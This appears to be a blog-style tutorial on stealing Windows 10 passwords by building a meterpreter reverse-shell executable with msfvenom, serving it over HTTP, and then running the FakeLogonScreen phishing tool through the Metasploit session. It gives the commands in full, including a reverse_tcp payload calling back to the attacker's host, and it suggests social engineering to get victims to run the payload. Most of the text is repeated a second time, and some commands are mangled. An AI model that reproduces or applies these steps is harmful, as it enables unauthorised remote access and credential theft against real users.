This article showcases a detailed guide on how to hack Windows 10 passwords using FakeLogonScreen.
I will be using FakeLogonScreen and Kali Linux to crack Windows 10 passwords. FakelogonScreen is a handy and hidden tool that creates a fake log on the screen on a target Windows 10 machine. This tool forces the target user to enter the correct credentials and, once received, passes it on to the attacker.
Arris Huijgen has developed this useful tool, it takes advantage of the normal behavior of the Windows environment, displays a login screen when it wakes up from sleep and prompts for credentials. At the time, this tool looked for phishing Windows credentials from the target, and the power of this tool came when it only accepts valid credentials.
Steps to Crack Windows 10 Password
Now let's try this tool and execute the exploit. We need to deploy two virtual machines i.e. Kali Linux and Windows 10. In my virtual lab environment Kali (attack machine) has IP: 192.168.0.103 and Windows (target machine) got 192.168.0.100.
Download FakeLogonScreen in Kali Linux
First, we need to download the FakeLogonScreen executable file on our attacking machine from the link:
github.com
Now, suppose the target computer is connected to the same network as the attacking computer.
Generating a Malicious Windows Hacking Payload
We will create a malicious payload using the msfvenom tool according to the information received by the target system. We will set up lhost to the IP of our Kali, which is 192.168.0.103, and set the lport to 4444. Since we are interested in using a Windows system, we will generate the payload as an executable file so that we can easily execute it on the target machine. Use the command:
Here 'payload.exe' is the name of the generated payload. We will then run Python One-liner to create an HTTP server that will host this malicious payload on port 80 of the target machine.
Load the payload on the target machine
Everything is ready now, the most important stage has come when we need to get a target to download this malicious payload. In real life scenarios, an attacker could use various social engineering techniques and allow the targeted user to download this malicious file to their system.
For a practical demonstration, we will access the directory of our Kali machine from a Windows machine and load the payload.
This will also show the current logs in our Kali machine.
Launch Metasploit to use
Let's go straight back to Kali and launch the Metasploit-framework.
Use a module multi/handler.
Install the payload windows/meterpreter/reverse_tcp.
Set lhost as our IP i.e. 192.168.0.103 and lport as 4444
After configuring all of this, simply run the exploit, go back to your Windows computer and run the executable, that is, "payload.exe". This will quickly give us a metrologist session.
Download executable file
Now download the FakeLogonScreen executable that we downloaded earlier. Make sure you provide the correct path to the executable file.
> upload /root/Downloads/FakeLogonScreen.exe
After that, access the shell and run FakeLogonScreen.exe as shown below:
And BOOM! On the target computer, all running windows will be closed and a login screen appears asking for credentials and displayed as a valid window. The user did not hesitate for a second to enter their credentials and get their work back.
To test the reliability of this tool, we will enter the wrong password.
And it will show the error "Password is incorrect, please try again." This is the power of the FakeLogonScreen tool, which forces the target to enter their correct password. The user has no choice but to enter their password.
Let's enter the correct password and you will get a standard window as nothing happened before.
It also shows that FakeLogonScreen works similarly to a keylogger. An attacker can easily monitor all logs and can obtain the correct password of the target user.
Some useful information
This tool can also work effectively on multiple desktop systems. When launched on different desktops, all affected screens turn black immediately after the exploit is executed from the attacking machine. This works even if the target user has set a customized background.
The exploit zip file also contains another executable file named "FakeLogonScreenToFile.exe", which works the same as the previous executable file. However, it has some additional features, i.e. not only shows the password, but also saves it to a file %LOCALAPPDATA%\Microsoft\user.db.
This tool can also be integrated with Cobalt Strike for efficient performance.
I will be using FakeLogonScreen and Kali Linux to crack Windows 10 passwords. FakelogonScreen is a handy and hidden tool that creates a fake log on the screen on a target Windows 10 machine. This tool forces the target user to enter the correct credentials and, once received, passes it on to the attacker.
Arris Huijgen has developed this useful tool, it takes advantage of the normal behavior of the Windows environment, displays a login screen when it wakes up from sleep and prompts for credentials. At the time, this tool looked for phishing Windows credentials from the target, and the power of this tool came when it only accepts valid credentials.
Steps to Crack Windows 10 Password
Now let's try this tool and execute the exploit. We need to deploy two virtual machines i.e. Kali Linux and Windows 10. In my virtual lab environment Kali (attack machine) has IP: 192.168.0.103 and Windows (target machine) got 192.168.0.100.
Download FakeLogonScreen in Kali Linux
First, we need to download the FakeLogonScreen executable file on our attacking machine from the link:
Releases · bitsadmin/fakelogonscreen
Fake Windows logon screen to steal passwords. Contribute to bitsadmin/fakelogonscreen development by creating an account on GitHub.
github.com
Now, suppose the target computer is connected to the same network as the attacking computer.
Generating a Malicious Windows Hacking Payload
We will create a malicious payload using the msfvenom tool according to the information received by the target system. We will set up lhost to the IP of our Kali, which is 192.168.0.103, and set the lport to 4444. Since we are interested in using a Windows system, we will generate the payload as an executable file so that we can easily execute it on the target machine. Use the command:
Code:
# msfvenom -p windows / meterpreter / reverse_tcp lhost = 192.168.0.103 lport = 4444 -f exe >> payload.exeHere 'payload.exe' is the name of the generated payload. We will then run Python One-liner to create an HTTP server that will host this malicious payload on port 80 of the target machine.
Code:
#python -m SimpleHTTPServer 80Load the payload on the target machine
Everything is ready now, the most important stage has come when we need to get a target to download this malicious payload. In real life scenarios, an attacker could use various social engineering techniques and allow the targeted user to download this malicious file to their system.
For a practical demonstration, we will access the directory of our Kali machine from a Windows machine and load the payload.
This will also show the current logs in our Kali machine.
Launch Metasploit to use
Let's go straight back to Kali and launch the Metasploit-framework.
Use a module multi/handler.
Install the payload windows/meterpreter/reverse_tcp.
Set lhost as our IP i.e. 192.168.0.103 and lport as 4444
After configuring all of this, simply run the exploit, go back to your Windows computer and run the executable, that is, "payload.exe". This will quickly give us a metrologist session.
Download executable file
Now download the FakeLogonScreen executable that we downloaded earlier. Make sure you provide the correct path to the executable file.
> upload /root/Downloads/FakeLogonScreen.exe
After that, access the shell and run FakeLogonScreen.exe as shown below:
And BOOM! On the target computer, all running windows will be closed and a login screen appears asking for credentials and displayed as a valid window. The user did not hesitate for a second to enter their credentials and get their work back.
To test the reliability of this tool, we will enter the wrong password.
And it will show the error "Password is incorrect, please try again." This is the power of the FakeLogonScreen tool, which forces the target to enter their correct password. The user has no choice but to enter their password.
Let's enter the correct password and you will get a standard window as nothing happened before.
It also shows that FakeLogonScreen works similarly to a keylogger. An attacker can easily monitor all logs and can obtain the correct password of the target user.
Some useful information
This tool can also work effectively on multiple desktop systems. When launched on different desktops, all affected screens turn black immediately after the exploit is executed from the attacking machine. This works even if the target user has set a customized background.
The exploit zip file also contains another executable file named "FakeLogonScreenToFile.exe", which works the same as the previous executable file. However, it has some additional features, i.e. not only shows the password, but also saves it to a file %LOCALAPPDATA%\Microsoft\user.db.
This tool can also be integrated with Cobalt Strike for efficient performance.
